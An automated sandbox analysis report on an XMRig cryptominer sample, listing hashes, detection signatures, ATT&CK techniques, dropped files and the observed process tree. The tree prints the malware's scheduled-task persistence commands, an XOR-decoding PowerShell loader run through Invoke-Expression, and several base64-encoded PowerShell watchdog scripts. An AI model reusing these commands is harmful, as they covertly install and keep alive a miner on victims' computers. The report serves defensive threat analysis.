xmrig | b96e81b936927a165c12f9752aa25a7753ab1ce2d429374b585512090031d853

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-11-2024 12:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
Size

3.1MB
MD5

ba88b24a04173ea75c436dee3b394975
SHA1

bdd9e32cf205c1135bcc7a2453dda08cbbfc666e
SHA256

b96e81b936927a165c12f9752aa25a7753ab1ce2d429374b585512090031d853
SHA512

a0c706c8ffe8d8d5b2c44e7fa334df5324304444b97a0693cf7b3ca67add8fbb11c78522559797c9411dbb94b87ada4febc63766783335d0589e0167b9586864
SSDEEP

49152:FMDRZ9IBVL+s0ezJGd80SHMsThF35Hj1BzuAhcEC1Xoe:FMDtIXLr06AdfEThF35PzuacEQD

Score

10^/10

xmrig defense_evasion discovery execution miner pyinstaller

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/736-42-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-966-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-1206-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-1241-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-1243-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-1249-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-1251-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-1253-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/736-1255-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
40	2676	powershell.exe
42	2676	powershell.exe
43	2676	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	maintenance.exe

Executes dropped EXE 5 IoCs

pid	Process
3180	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
264	maintenance.exe
4596	wmntnnc
4740	wmntnnc
4872	maintenance.exe

Loads dropped DLL 60 IoCs

pid	Process
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2676	powershell.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023cb6-48.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	maintenance.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmntnnc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmntnnc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	maintenance.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2648	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2260	ipconfig.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1676	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2676	powershell.exe
2064	powershell.exe
5112	powershell.exe
5112	powershell.exe
2344	powershell.exe
2344	powershell.exe
2064	powershell.exe
2064	powershell.exe
5112	powershell.exe
2344	powershell.exe
2064	powershell.exe
2064	powershell.exe
4740	wmntnnc
4740	wmntnnc

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	736	idle_maintenance.exe
Token: SeLockMemoryPrivilege	736	idle_maintenance.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4740	wmntnnc
4740	wmntnnc
4740	wmntnnc

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3180	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
3180	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
4740	wmntnnc

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 3620 wrote to memory of 1076	3620	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	84
PID 3620 wrote to memory of 1076	3620	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	84
PID 3620 wrote to memory of 1076	3620	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	84
PID 3620 wrote to memory of 1680	3620	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	86
PID 3620 wrote to memory of 1680	3620	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	86
PID 3620 wrote to memory of 1680	3620	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	86
PID 1076 wrote to memory of 3844	1076	cmd.exe	88
PID 1076 wrote to memory of 3844	1076	cmd.exe	88
PID 1076 wrote to memory of 3844	1076	cmd.exe	88
PID 1680 wrote to memory of 3424	1680	cmd.exe	89
PID 1680 wrote to memory of 3424	1680	cmd.exe	89
PID 1680 wrote to memory of 3424	1680	cmd.exe	89
PID 1076 wrote to memory of 1676	1076	cmd.exe	90
PID 1076 wrote to memory of 1676	1076	cmd.exe	90
PID 1076 wrote to memory of 1676	1076	cmd.exe	90
PID 1680 wrote to memory of 3180	1680	cmd.exe	92
PID 1680 wrote to memory of 3180	1680	cmd.exe	92
PID 1680 wrote to memory of 3180	1680	cmd.exe	92
PID 1680 wrote to memory of 2648	1680	cmd.exe	93
PID 1680 wrote to memory of 2648	1680	cmd.exe	93
PID 1680 wrote to memory of 2648	1680	cmd.exe	93
PID 3180 wrote to memory of 3840	3180	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	94
PID 3180 wrote to memory of 3840	3180	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	94
PID 3180 wrote to memory of 3840	3180	2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe	94
PID 3840 wrote to memory of 2260	3840	cmd.exe	96
PID 3840 wrote to memory of 2260	3840	cmd.exe	96
PID 3840 wrote to memory of 2260	3840	cmd.exe	96
PID 2676 wrote to memory of 2064	2676	powershell.exe	122
PID 2676 wrote to memory of 2064	2676	powershell.exe	122
PID 2676 wrote to memory of 2064	2676	powershell.exe	122
PID 2676 wrote to memory of 4596	2676	powershell.exe	123
PID 2676 wrote to memory of 4596	2676	powershell.exe	123
PID 2676 wrote to memory of 4596	2676	powershell.exe	123
PID 2676 wrote to memory of 2344	2676	powershell.exe	124
PID 2676 wrote to memory of 2344	2676	powershell.exe	124
PID 2676 wrote to memory of 2344	2676	powershell.exe	124
PID 2676 wrote to memory of 5112	2676	powershell.exe	125
PID 2676 wrote to memory of 5112	2676	powershell.exe	125
PID 2676 wrote to memory of 5112	2676	powershell.exe	125
PID 4596 wrote to memory of 4740	4596	wmntnnc	126
PID 4596 wrote to memory of 4740	4596	wmntnnc	126
PID 4596 wrote to memory of 4740	4596	wmntnnc	126
PID 5112 wrote to memory of 4872	5112	powershell.exe	127
PID 5112 wrote to memory of 4872	5112	powershell.exe	127
PID 5112 wrote to memory of 4872	5112	powershell.exe	127

C:\Users\Admin\AppData\Local\Temp\2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20241119123722538.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1076
- - C:\Windows\SysWOW64\schtasks.exe
    Schtasks.Exe /delete /tn "Maintenance" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3844
- - C:\Windows\SysWOW64\schtasks.exe
    Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20241119123722538.xml"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20241119123722538.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\SysWOW64\chcp.com
    chcp 1251
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3424
- - C:\Users\Admin\AppData\Local\Temp\2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-11-19_ba88b24a04173ea75c436dee3b394975_magniber_nymaim.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /C ipconfig /all >> "C:\Users\Admin\AppData\Local\Temp\HP_CCC\HpOsInfo.txt"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3840
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /all
        5⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:2260
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2648

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:264
- C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe
  C:\Users\Admin\AppData\Local\Temp\4f4647414455534547205988590859817822720016\idle_maintenance.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:736
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=112,30,3,56,225,59,155,229;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2064
- - C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
    ".\wmntnnc"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
      ".\wmntnnc"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:4740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand JABwAGEAdABoAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA0ACgANAAoAJABiAGkAbgBmAG4APQAwAA0ACgBkAG8AIAB7AA0ACgAgACQAZgBpAGwAZQBzACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAEYAaQBsAHQAZQByACAAXwBNAEUASQAqAA0ACgAgAEYAbwByAEUAYQBjAGgAIAAoACQAZgBuACAAaQBuACAAJABmAGkAbABlAHMAKQAgAHsADQAKACAAIAAkAGIAaQBuAGYAbgA9ACQAcABhAHQAaAArACcAXAAnACsAJABmAG4ALgBuAGEAbQBlACsAJwBcAFEAdABHAHUAaQA0AC4AZABsAGwAJwANAAoAIAB9AA0ACgAgAGkAZgAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADEAMAAwAH0ADQAKAH0ADQAKAHcAaABpAGwAZQAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAA0ACgANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACQAYgBpAG4AZgBuACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoADQAKACQAZgBzAD0AMAANAAoAZABvAHsADQAKACAAdAByAHkAewAkAGYAcwAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGIAaQBuAGYAbgApAH0ADQAKACAAYwBhAHQAYwBoAHsAJABmAHMAPQAwAH0ADQAKACAAaQBmACgALQBuAG8AdAAgACQAZgBzACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAAfQANAAoAfQANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgACQAZgBzACkADQAKAA0ACgAkAGEAPQA1ADEANwA2ADEAOAA2AA0ACgAkAG4APQA0AA0ACgAkAGYAcwAuAFMAZQBlAGsAKAAkAGEALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAbgA7ACQAaQArACsAKQB7ACQAZgBzAC4AVwByAGkAdABlAEIAeQB0AGUAKAAwACkAfQANAAoAJABmAHMALgBDAGwAbwBzAGUAKAApACAADQAKAGUAeABpAHQA
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand dwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACcALgBcAHMAaQBuAGcAbABlAHQAbwBuAC4AbABvAGMAawAnACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAxADAAMAAwADsAJABpACsAKwApAA0ACgB7AA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwArACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAJABwAHIAdABjAC4AVwBhAGkAdABGAG8AcgBFAHgAaQB0ACgAKQANAAoAIAANAAoAIABpAGYAKAAkAHAAcgB0AGMALgBFAHgAaQB0AEMAbwBkAGUAIAAtAGUAcQAgADcANwA3ACkAewBiAHIAZQBhAGsAfQANAAoAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKACAAZQB4AGkAdAANAAoAfQA=
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
      "C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe" +
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HP_CCC\HpOsInfo.txt

Filesize
90B

MD5
7f86a7c8fa4a6eb9b9e1acdcf4529dff

SHA1
e445dd95a96b1580db5bfb73ad58231a3debd995

SHA256
68409a9f59afefc8a2bc14408cc71989c1f577ec1f4ca5b9d098ae547e614364

SHA512
c71dc7cd011e50502d70f4b68279a843b0ad41494f8f610119bbf1fa4182e1eb2b525d3475a20970fe608d2e26d42c9dd0b0adfcb3d9f103f47d67230c611ced

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\Bitmessage_x86_0.6.3.2.exe.manifest

Filesize
1KB

MD5
664f2d313870b7a5221f64843b982ca6

SHA1
0aa6161f154f4c706b735ad94b98fc640eb22c8e

SHA256
cb22d067d3131f5d5285ccf3d32132de5db9ae6d3e7ce07b423810ff608b1f0c

SHA512
6a8faacbad176e435e37424ac84e0f5745cfd93165a0798c3eff8b2b16bc15d759e5cd95975783ed8f93f01a3d38dfedf6718ddcb6f17788297bee3933369894

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\QtCore4.dll

Filesize
2.4MB

MD5
06393b89000d04d73d29c208bae4b624

SHA1
2039597ce0649ca6502ac8ed4277d4ae788388bd

SHA256
0ccbc8d47c5677778b85d9625f2d2e9b49084572c984f60f6b6ce6f23a082c23

SHA512
e717bbcea9572f33faf1448146ef454c5eb0e93286d7678d36023e694affad64fdd91622cb28b9610c02ab094249c8dd397b6283a89a9173b05358bb3af186d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\_ctypes.pyd

Filesize
89KB

MD5
f1134b690b2dc0e6aa0f31be1ed9b05f

SHA1
9c27067c0070b9d9366da78c3d241b01ba1fa4ee

SHA256
030bf1aaff316dfbb1b424d91b1340b331c2e38f3e874ae532284c6170d93e7e

SHA512
7db97dd004c2d9ce28cd3856f32d96d3a2f696f922c188dbc1150ba35c9a859cdb8d5ed0264a437944ef0fb662f801e2af66f5ecce58c8ee9d2ebf852af8f170

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\_multiprocessing.pyd

Filesize
27KB

MD5
4f7cfe168ff9fb400cac099cf3336145

SHA1
a0e74ed858ff443d02678fc7949ce51b549b7f3b

SHA256
4bcdeb300f5b733ef09bdbe3befba8dfc1126cc349d48fd0c845ce633adbd924

SHA512
1b07b5b205abefae3ef70c1aaec9464e6ee11b059e45f796b3e7e6eb630f5c95f748e4a143d0c9d5209367b8f5fbb7aed28f659e625fef2fda0834c250a9dd22

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\_sqlite3.pyd

Filesize
49KB

MD5
cf6e48afbad2a930775723387080d2c3

SHA1
5172b9e02a6fae1f1f5cb3d4433dc9c4fcd2e234

SHA256
b355041828e249b476d198f5b245b89a32e1a857f401f137e768e6e2f8b5f687

SHA512
2cf137de885cf06222197fd2d47dc53190824b0ba5470562f2e96910770a76b0f3233d8e3184120bb692c411915f814471e77caf5b447405ed77568da9508653

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45962\_ssl.pyd

Filesize
1.3MB

MD5
d0e36d53cbcea2ac559fec2c596f5b06

SHA1
